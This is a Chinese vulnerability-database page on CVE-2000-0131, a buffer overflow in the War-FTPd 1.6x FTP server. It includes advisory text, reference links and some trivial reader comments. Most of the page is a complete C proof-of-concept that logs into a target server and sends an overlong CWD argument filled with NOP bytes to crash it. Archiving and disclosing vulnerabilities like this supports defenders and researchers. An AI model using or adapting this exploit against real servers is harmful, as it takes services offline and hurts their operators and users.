War-FTPd 1.6x CWD/MKD DoS漏洞
漏洞ID | 1105701 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 2000-02-03 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-2000-0131 |
CNNVD-ID | CNNVD-200002-013 |
漏洞平台 | Windows | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
WarFTPd1.6x版本存在缓冲区溢出漏洞。用户借助超长MKD和CWD命令可以导致拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/966/info
War-FTPd 1.67 and possibly previous versions are susceptible to a buffer overflow DoS attack.
Due to improper bounds checking in the code that handles MKD and CWD commands, it is possible to remotely crash the server by submitting extremely long pathnames as arguments to either command.
/*--------------------------------------------------------------*/
/* war-ftpd 1.66x4s and 1.67-3 DoS sample by crc "warftpd-dos.c"*/
/*--------------------------------------------------------------*/
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>
#define FTP_PORT 21
#define MAXBUF 8182
//#define MAXBUF 553
#define MAXPACKETBUF 32000
#define NOP 0x90
void main(int argc,char *argv[])
{
SOCKET sock;
unsigned long victimaddr;
SOCKADDR_IN victimsockaddr;
WORD wVersionRequested;
int nErrorStatus;
static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
hostent *victimhostent;
WSADATA wsa;
if (argc < 3){
printf("Usage: %s TargetHost UserName Passwordn",argv[0]); exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
nErrorStatus = WSAStartup(wVersionRequested, &wsa);
if (atexit((void (*)(void))(WSACleanup))) {
fprintf(stderr,"atexit(WSACleanup)failedn"); exit(-1);
}
if ( nErrorStatus != 0 ) {
fprintf(stderr,"Winsock Initialization failedn"); exit(-1);
}
if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
fprintf(stderr,"Can't create socket.n"); exit(-1);
}
victimaddr = inet_addr((char*)argv[1]);
if (victimaddr == -1) {
victimhostent = gethostbyname(argv[1]);
if (victimhostent == NULL) {
fprintf(stderr,"Can't resolve specified host.n"); exit(-1);
}
else
victimaddr = *((unsigned long *)((victimhostent->h_addr_list)[0]));
}
victimsockaddr.sin_family = AF_INET;
victimsockaddr.sin_addr.s_addr = victimaddr;
victimsockaddr.sin_port = htons((unsigned short)FTP_PORT);
memset(victimsockaddr.sin_zero,(int)0,sizeof(victimsockaddr.sin_zero));
if(connect(sock,(struct sockaddr *)&victimsockaddr,sizeof(victimsockaddr)) == SOCKET_ERROR){
fprintf(stderr,"Connection refused.n"); exit(-1);
}
printf("Attacking war-ftpd ...n");
recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
sprintf((char *)packetbuf,"USER %srn",argv[2]);
send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
sprintf((char *)packetbuf,"PASS %srn",argv[3]);
send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;
sprintf((char *)packetbuf,"CWD %srn",buf);
send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
Sleep(100);
shutdown(sock, 2);
closesocket(sock);
WSACleanup();
printf("done.n");
}
|参考资料
来源:BID
名称:966
链接:http://www.securityfocus.com/bid/966
来源:OSVDB
名称:4677
链接:http://www.osvdb.org/4677
来源:BUGTRAQ
名称:20000201war-ftpd1.6xDoS
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=94960703721503&w;=2
相关推荐: Multiple Caldera Encrypted root Password Local Disclosure Vulnerability
Multiple Caldera Encrypted root Password Local Disclosure Vulnerability 漏洞ID 1102379 漏洞类型 Design Error 发布时间 2002-02-18 更新时间 2002-0…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666